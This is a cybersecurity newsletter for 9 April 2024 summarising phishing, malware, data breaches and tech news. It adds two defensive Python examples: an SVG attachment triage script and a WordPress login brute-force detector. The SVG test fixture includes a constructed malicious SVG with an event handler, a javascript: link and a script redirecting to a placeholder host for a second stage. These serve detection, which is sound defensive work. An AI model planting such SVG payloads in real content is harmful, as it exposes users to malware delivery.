Cyber Briefing: 2024.04.09


What's the latest in the cyber world today?

Obfuscation Tools, Multi-Stage Malware, Invoice Phishing, YouTube Channels, Infostealer Malware, WordPress Sites, Crypto Pop-up Scams, Ahoi Attacks, Fortinet Vulnerability, RMM Tools, Backdoors, Home Depot, boAt, Greylock McKinnon Associates, Inc., U.S. Department of Justice, Targus, U.S. Securities and Exchange Commission, Philippines, US Federal Communications Commission, Connected Car Stalking, Meta, AI-Generated Content, Microsoft, London Office, Apple Job Layoffs, Google, Android Users.

Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.



Cyber Alerts


1. VenomRAT Invoice Phishing Attack

Cybersecurity experts unveil an intricate attack utilizing invoice-themed phishing lures to deploy Venom RAT, Remcos RAT, XWorm, NanoCore RAT, and a crypto wallet stealer. Email attachments containing SVG files trigger the infection sequence, as revealed by Fortinet FortiGuard Labs. The attackers employ sophisticated obfuscation techniques like BatCloak and ScrubCrypt, showcasing a versatile and adaptable assault methodology.
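SVG files are XML, so a mail gateway or an analyst can inspect an attachment for the active content (inline scripts, event-handler attributes, script-scheme links, embedded HTML) that lets an image file act as a first stage. The triage routine below is an added example, not code from the newsletter or from Fortinet's report; the two SVG samples are constructed, and the placeholder host in the suspicious one is invented for illustration.

```python
import re
import xml.etree.ElementTree as ET  # stdlib; for untrusted input in production prefer defusedxml

# Constructed samples (not taken from the FortiGuard report): a plain icon and a
# lure that carries an inline script, an event handler and a javascript: link.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""

SUSPICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="run()">
  <a xlink:href="javascript:run()"><text x="1" y="9">Invoice #1234</text></a>
  <script>function run() { location = "http://placeholder.invalid/stage2"; }</script>
</svg>"""

# Elements that let an SVG execute code or embed foreign (HTML) content.
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
# URI schemes that turn a link or resource reference into code execution.
ACTIVE_URI = re.compile(r"^\s*(javascript|vbscript):|^\s*data:\s*text/html", re.IGNORECASE)


def _local(name):
    """Drop the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()


def triage_svg(data):
    """Return a list of findings for one SVG attachment; empty means nothing active was seen."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Malformed XML is itself worth a look: it may be an evasion attempt.
        return [f"unparseable XML: {exc}"]
    findings = []
    for elem in root.iter():  # includes the root element itself
        tag = _local(elem.tag)
        if tag in ACTIVE_TAGS:
            findings.append(f"active element <{tag}>")
        for attr, value in elem.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in ("href", "src") and ACTIVE_URI.match(value):
                findings.append(f"active URI in {name} on <{tag}>")
    return findings


if __name__ == "__main__":
    for label, svg in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, triage_svg(svg) or "clean")
```

Any non-empty finding list is a reason to quarantine the attachment or open it only in a sandbox; a rendering SVG never needs script elements, event handlers or javascript: links.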


2. YouTube Channels Hacked for Malware

Hackers target renowned YouTube channels to exploit their vast audience and monetize through ransom demands and illicit ad revenues. These channels serve as potent tools for spreading malware and propaganda, as discovered by cybersecurity researchers at ASEC. Popular channels, spanning various genres, have become prime targets for large-scale attacks, amplifying the threat posed by infostealer malware like Vidar and LummaC2.


3. Crypto Pop-up Scams on WordPress

Hackers exploit nearly 2,000 hacked WordPress sites, luring visitors with fake NFT and discount pop-ups to steal crypto funds. Initially compromising 1,000 sites for crypto drainers, attackers now employ malicious scripts to brute-force admin passwords on other sites. Pop-ups entice users to connect wallets, leading to theft of funds and NFTs, emphasizing the need for vigilance in online interactions.
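Password brute-forcing against WordPress shows up in the site's web server access log as bursts of POST requests to the login endpoint from a single address. The sliding-window detector below is an added example, not code from the newsletter or the researchers it cites; it assumes Apache/Nginx combined log format, and the sample log is constructed with reserved documentation addresses (203.0.113.7, 198.51.100.2).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format: client, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# xmlrpc.php is the other endpoint commonly used for password guessing.
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}


def parse_line(line):
    """Parse one access-log line into (ip, timestamp, method, path, status); None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # ignore the query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: peak_attempts} for addresses that POSTed to a login endpoint
    at least `threshold` times inside any sliding `window`."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method == "POST" and path in LOGIN_PATHS:
            attempts[ip].append(ts)
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def _line(ip, when, method, path, status=200):
    """Build one combined-format log line for the constructed sample."""
    ts = when.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 1432 "-" "Mozilla/5.0"'


# Constructed sample log (not a real capture): 12 login POSTs in 44 seconds from
# one address, two spaced-out logins from another, unrelated GETs and one bad line.
_BASE = datetime(2024, 4, 9, 10, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    [_line("203.0.113.7", _BASE + timedelta(seconds=4 * i), "POST", "/wp-login.php") for i in range(12)]
    + [_line("203.0.113.7", _BASE, "GET", "/wp-login.php")]
    + [_line("198.51.100.2", _BASE + timedelta(seconds=30 * i), "POST",
             "/wp-login.php?redirect_to=%2Fwp-admin%2F", 302) for i in range(2)]
    + [_line("198.51.100.2", _BASE + timedelta(minutes=5), "GET", "/index.php")]
    + ["this line is not in combined log format"]
)

if __name__ == "__main__":
    print(detect_login_bruteforce(SAMPLE_LOG))  # {'203.0.113.7': 12}
```

The threshold and window are tuning knobs: a real login form rarely sees more than a handful of POSTs per minute from one client, so a flagged address is a candidate for rate limiting or a temporary block, and the same counting works equally well on xmlrpc.php traffic.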


4. VMs Compromised by Ahoi Attacks

ETH Zurich researchers unveil Ahoi attacks targeting cloud-based confidential virtual machines (CVMs), exploiting vulnerabilities in AMD SEV-SNP and Intel TDX technologies. Through malicious hypervisors injecting interrupts, attackers can compromise CVM integrity and gain root access. Despite Linux kernel patches and mitigations, cloud vendors like AWS and Google face varying impacts, urging heightened security measures.


5. Fortinet Vulnerability Exploit Alert

Threat actors leverage a Fortinet FortiClient EMS vulnerability (CVE-2023-48788) to implant unauthorized RMM tools and PowerShell backdoors. After establishing an external network connection, they use the SQL injection to execute SYSTEM-level commands, then download and execute malicious payloads. Fortinet has patched the vulnerability (CVSS severity 9.8), but vigilance and immediate updates are crucial for protection.



Cyber Incidents


6. Home Depot Employee Data Breach

Home Depot confirms exposure of 10,000 employees' data, raising concerns over targeted phishing risks. The breach, facilitated by a third-party software provider's accidental data exposure, underscores the vulnerability large corporations face with third-party suppliers. This incident highlights the critical need for robust cybersecurity measures in safeguarding sensitive employee information from unauthorized access and exploitation.


7. boAt Hit by Massive Data Breach

Over 7.5 million boAt customers' personal data was compromised, posing grave risks and highlighting data security concerns. Hacker ShopifyGUY dumps 2GB of PII on the dark web, including names, addresses, and contact details. The breach threatens customer privacy and demands urgent action from boAt Lifestyle.


8. Consulting Firm Cyberattack Exposes DOJ Data

Medicare and personal information of 341,000 people were leaked in a cyberattack on a DOJ-affiliated consulting firm. Greylock McKinnon Associates reported the breach, revealing the sensitive details accessed, including Social Security numbers and medical data. Despite efforts to delete the compromised data, questions remain about the extent of the breach's impact.


9. Targus Cyberattack Disrupts Operations

Targus, renowned for laptop and tablet accessories, faces a cyberattack, halting operations after hackers breached its file servers. Parent company B. Riley Financial, Inc. disclosed the incident, highlighting the proactive containment measures Targus initiated to limit unauthorized access. While the attack has been contained, recovery efforts with external cybersecurity experts are ongoing.


10. Philippines Probes BOC Data Breach

The Department of Information and Communications Technology (DICT) initiates an investigation into the recent data breach affecting the Bureau of Customs (BOC) in the Philippines, orchestrated by hackers identified as DeathNote Hackers PH and others. With over 2,200 employees and 80,000 customers' personal data compromised, the breach underscores systemic vulnerabilities within BOC's cybersecurity framework, Deep Web Konek warned.



Cyber News


11. US FCC Investigates Car Stalking

The Federal Communications Commission (FCC) initiates formal proceedings to prevent connected car stalking, particularly targeting survivors of domestic violence. The agency seeks to ensure automakers and service providers actively assist abuse survivors, building on the 2022 Safe Connections Act enforcement efforts. Proposed rules may designate connected cars as MVNOs, enhancing FCC's regulatory powers and mandating transparency in data practices to safeguard survivors.


12. Meta Implements AI Content Policy

Meta introduces a policy requiring content creators to self-declare if they used generative AI for their audio, video, and image content. This shift follows recommendations from the Meta Oversight Board to update policies regarding manipulated media, aiming to provide users with more context and transparency on potentially deceptive content. Despite concerns about misleading information, Meta argues that labeling AI-generated content rather than removing it entirely allows users to make more informed decisions and mitigates risks associated with censorship.


13. Microsoft's London AI Hub

Mustafa Suleyman, former co-founder of Google DeepMind and now CEO of Microsoft AI, has announced the opening of a new hub in London. This hub aims to advance language models and infrastructure and collaborate closely with AI teams across Microsoft and its partners. Headed by AI scientist Jordan Hoffman, the office signifies a significant investment in the UK's AI talent pool.


14. Apple Lays Off 600 Employees

Amid the termination of its ambitious self-driving car initiative, Project Titan, Apple has reportedly laid off over 600 employees in California, including those involved in car and smartwatch display projects. The company's decision to shut down Project Titan after a decade-long effort marks a significant shift in its strategic focus, potentially redirecting resources toward other endeavors like artificial intelligence. This move underscores the challenges and uncertainties inherent in pioneering efforts to enter new industries, as seen in recent layoffs across various tech giants.


15. Enhanced Android Tracking Network

Google introduces upgraded Find My Device network for Android users in the US and Canada, enabling location tracking even when devices are offline or have dead batteries. The network leverages Bluetooth proximity from over one billion active Android devices to locate lost phones and tablets. Soon, users will be able to track other items equipped with compatible Bluetooth tracker tags.




Copyright © 2024 CyberMaterial. All Rights Reserved.





Love the comprehensive update. To further amplify your cybersecurity awareness efforts, consider integrating interactive webinars with industry experts into your content strategy, fostering a community of informed users while deploying multivariate testing beyond the basic A/B to decipher optimal engagement strategies.

Vishal Chawla

Cybersecurity Strategist & CEO @ BluOcean

11 months

The real issue is the drastic change in the world of third-party interactions due to SaaS applications. The Home Depot breach is a classic example, similar to the number of clients we have been helping recently with SaaS security. Home Depot should have been actively monitoring all access management functions. According to the shared responsibility model, managing access in both production and development environments is Home Depot's responsibility, NOT THE VENDOR'S. Additionally, when data is transferred downstream, Home Depot should have ensured that proper protocols and technology have been implemented to protect the data. For example, Salesforce sells Data Mask products specifically for masking data in downstream systems, which could have mitigated such risks. But it's not Salesforce's responsibility to implement and configure it. Check out our write-up on how to secure your third-party SaaS vendors: https://www.dhirubhai.net/posts/vishalchawla_securing-saas-building-tprm-program-for-activity-7158891976900157441-fvwf?utm_source=share&utm_medium=member_desktop
